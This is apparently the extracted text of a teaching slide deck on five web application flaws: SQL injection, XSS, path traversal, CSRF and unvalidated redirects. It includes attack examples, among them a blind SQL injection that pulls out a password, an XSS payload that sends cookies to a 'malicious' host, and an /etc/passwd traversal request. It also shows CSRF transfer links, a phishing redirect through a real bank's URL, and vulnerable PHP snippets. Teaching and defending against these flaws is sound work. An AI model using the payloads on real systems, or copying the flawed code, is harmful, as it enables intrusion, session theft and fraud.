Webapp PDF

M o s t d a n g e r o u s w e b
a p p I i c a t i o n e r r o r s
S e c u r i t y o f Ì n f o r m a t i o n S y s t e m s
Agenda
1. SQL Ìnjection
2. Cross Site Scripting (XSS)
3. Path Traversal
4. Cross Site Request Forgery (CSRF)
5. Unvalidated Redirect
SQL Injection
S Q L I n j e c t i o n
h t t p : / / e x a m p l e . c o m / i t e m s . p h p ? i d = 2
S E L E C T t i t l e , d e s c r i p t i o n , b o d y F R O M i t e m s W H E R E I D = 2
SQL Injection
http://example.com/items.php?id=2 or 1=2
SELECT title, description, body
FROM items WHERE ID = 2 or 1=2
SQL Injection (BIind)
IF(expression, true, false)
UNION SELECT
IF(SUBSTRING(user_password,1,1) = CHAR(50), --expression
BENCHMARK(5000000,ENCODE('MSG','by 5 seconds')), --true
null) --false
FROM users WHERE user_id = 1;
S Q L I n j e c t i o n ( B I i n d )
h t t p : / / e x a m p l e . c o m / i t e m s . p h p ? i d = 1 U N I O N S E L E C T I F ( S U B S T R I N G
( u s e r _ p a s s w o r d , 1 , 1 ) = C H A R ( 5 0 ) , B E N C H M A R K ( 5 0 0 0 0 0 0 , E N C O D E
( ' M S G ' , ' b y 5 s e c o n d s ' ) ) , n u l l ) F R O M u s e r s W H E R E u s e r _ i d =
1 ;
Ì f t h e d a t a b a s e r e s p o n s e t o o k a l o n g t i m e , w e m a y e x p e c t t h a t t h e f i r s t u s e r
p a s s w o r d c h a r a c t e r w i t h u s e r _ i d = 1 i s c h a r a c t e r ' 2 ' .
SQL Injection
Defense
» Prepared Statements (Parameterized Queries)
String query = "SELECT account_balance FROM user_data WHERE user_name = ?
";
PreparedStatement stmt = connection.prepareStatement( query );
stmt.setString( 1, name);
» Stored Procedures
CallableStatement cs = connection.prepareCall("{call accountBalance(?)}");
cs.setString(1, custname);
» Escaping all user supplied input
Cross Site Scripting
http://example.com/img?src=url
<img src="url">
http://example.com/img?src=dont.exists" onerror="alert(1)
<img src="dont.exists" onerror="alert(1)">
http://example.com/filename
<? php
print "Not found: " . urldecode($_SERVER["REQUEST_URI"]);
?>
Not found: fiIename
C r o s s S i t e S c r i p t i n g
h t t p : / / e x a m p l e . c o m / < s c r i p t t y p e = t e x t / j a v a s c r i p t > i = n e w
I m a g e ( ) ; i . s r c = ' h t t p : / / m a l i c i o u s / ' + d o c u m e n t . c o o k i e < / s c r i p t >
N o t f o u n d : < s c r i p t t y p e = t e x t / j a v a s c r i p t >
i = n e w I m a g e ( ) ;
i . s r c = ' h t t p : / / m a l i c i o u s / ' + d o c u m e n t . c o o k i e
< / s c r i p t >
P a t h T r a v e r s a I
Path TraversaI
http://example.com/get.php?file=report.pdf
Path TraversaI
http://example.com/get.php?file=get.php
Path TraversaI
http://example.com/get.php?file=../get.php
Path TraversaI
http://example.com/get.php?file=../get.php
http://example.com/get.php?file=/etc/passwd
Path TraversaI
<?php
$template = 'blue.php';
if ( is_set( $_COOKIE['TEMPLATE'] ) )
$template = $_COOKIE['TEMPLATE'];
include ( "/home/users/php/templates/" . $template );
?>
Path TraversaI
Request
GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd
Path TraversaI
Request
GET /vulnerable.php HTTP/1.0
Cookie: TEMPLATE=../../../../../../../../../etc/passwd
Response
HTTP/1.0 200 OK
Content-Type: text/html
Server: Apache
root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh
daemon:*:1:1::/tmp:
php:f8fk3j1OIf31.:182:100:Developer:/home/users/php/:/bin/csh
Cross Site Request Forgery
Alice sends $100 to Bob
POST http://bank.com/transfer.do HTTP/1.1
...
Content-Length: 19;
account=BOB&amount=100
GET http://bank.com/transfer.do?acct= BOB&amount=100 HTTP/1.1
What if.?
What if.?
GET http://bank.com/transfer.do?acct= MARIA&amount=100000 HTTP/1.1
What if Alice gets an email from Maria?
HeIIo AIicel View my picfuresl
Hello Alice!
<a href=http://bank.com/transfer.do?acct= MARIA&amount=100000>
View my pictures!
</a>
What if Alice opens malicious website?
What if Alice opens malicious website?
<img src="http://bank.com/transfer.do?acct= MARIA&amount=100000"
width="1" height="1" border="0">
UnvaIidated Redirect
$redirect_url = $_GET['redir'];
header("Location: " . $redirect_url);
Email to Alice:
Greetings from your Bank!
Ìnternet Banking Log Ìn
Email to Alice:
<a href=¨https://www.53.com/?
a=123&b=1pUWTlSNfre4f2yfVLRruXgulWTVlF1czz0Kz00lL_5&redir=
www.evilbank.com&param=F1czz0Kz00lL_5g¨>
Internet Banking Log In
</a>
Email to Alice:
<a href=¨https://www.53.com/?
a=123&b=1pUWTlSNfre4f2yfVLRruXgulWTVlF1czz0Kz00lL_5&redir=
www.evilbank.com&param=F1czz0Kz00lL_5g¨>
Internet Banking Log In
</a>
Thank you
https://www.owasp.org/index.php/Blind_SQL_Ìnjection
https://www.owasp.org/index.php/SQL_Ìnjection_Prevention_Cheat_Sheet
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
https://www.owasp.org/index.php/Path_Traversal
https://www.owasp.org/index.php/CSRF
https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
https://www.53.com/site/global/ib-login.html

Webapp PDF

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Webapp PDF

Uploaded by

Copyright:

Available Formats

M o s t d a n g e r o u s w e b

You might also like